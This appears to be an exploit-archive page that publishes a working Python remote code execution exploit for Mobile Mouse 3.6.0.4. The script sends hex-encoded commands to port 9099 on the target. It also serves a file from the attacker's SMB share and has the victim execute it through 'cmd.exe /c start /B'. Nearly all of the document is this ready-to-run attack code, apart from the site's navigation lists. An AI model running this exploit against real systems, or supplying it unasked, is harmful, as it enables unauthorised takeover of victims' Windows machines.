Mobile Mouse 3.6.0.4 Remote Code Execution

Mobile Mouse 3.6.0.4 Remote Code Execution: Posted May 1, 2023; Authored by Chokri Hammedi; Mobile Mouse version 3.6.0.4 suffers from a remote code execution vulnerability. This exploit is a second version from the original author of the original exploit released in September of 2022.; tags | exploit, remote, code execution; SHA-256 | e7a6810d6a70959199eb39d58ef19ffc0f717838c3bcbb82681904466d5ca0d6; Download | Favorite | View

Mobile Mouse 3.6.0.4 Remote Code Execution

# Exploit Title: Mobile Mouse 3.6.0.4 Remote Code Execution v2 # Date: Apr
28, 2023

# Exploit Author: Chokri Hammedi

# Vendor Homepage: https://mobilemouse.com/

# Software Link: https://www.mobilemouse.com/downloads/setup.exe

# Version: 3.6.0.4

# Tested on: Windows 10 Enterprise LTSC Build 17763


#!/usr/bin/env python3


import socket

from time import sleep

import argparse

import threading

from impacket import smbserver


def smb_server(lhost, file_to_serve):

    server = smbserver.SimpleSMBServer(listenAddress=lhost, listenPort=445)

    server.addShare("share", ".", "")

    server.start()


help = " Mobile Mouse 3.6.0.4 Remote Code Execution "

parser = argparse.ArgumentParser(description=help)

parser.add_argument("--target", help="Target IP", required=True)

parser.add_argument("--file", help="File name to Upload", required=True)

parser.add_argument("--lhost", help="Your local IP", default="127.0.0.1")


args = parser.parse_args()


host = args.target

command_shell = args.file

lhost = args.lhost

port = 9099 # Default port


s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 256)

s.connect((host, port))



smb_server_thread = threading.Thread(target=smb_server, args=(lhost,
command_shell))

smb_server_thread.start()


CONN =
bytearray.fromhex("434F4E4E4543541E1E63686F6B726968616D6D6564691E6950686F6E651E321E321E04")

s.send(CONN)

run = s.recv(54)


RUN = bytearray.fromhex("4b45591e3131341e721e4f505404")

s.send(RUN)

run = s.recv(54)


sleep(0.5)


payload = f"cmd.exe /c start /B
\\\\{lhost}\\share\\{command_shell}".encode('utf-8')

hex_payload = payload.hex()

SHELL = bytearray.fromhex("4B45591E3130301E" + hex_payload + "1E04" +
"4b45591e2d311e454e5445521e04")

s.send(SHELL)

shell = s.recv(96)


print("Take The rose...")


sleep(30)

s.close()

Top Authors In Last 30 Days

Red Hat 232 files
Ubuntu 59 files
Debian 27 files
Valentin Lobstein 11 files
LiquidWorm 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
Yevhenii Butenko 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,318)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,567)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,456)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

Mobile Mouse 3.6.0.4 Remote Code Execution

Mobile Mouse 3.6.0.4 Remote Code Execution

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Mobile Mouse 3.6.0.4 Remote Code Execution

Share This

Mobile Mouse 3.6.0.4 Remote Code Execution

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems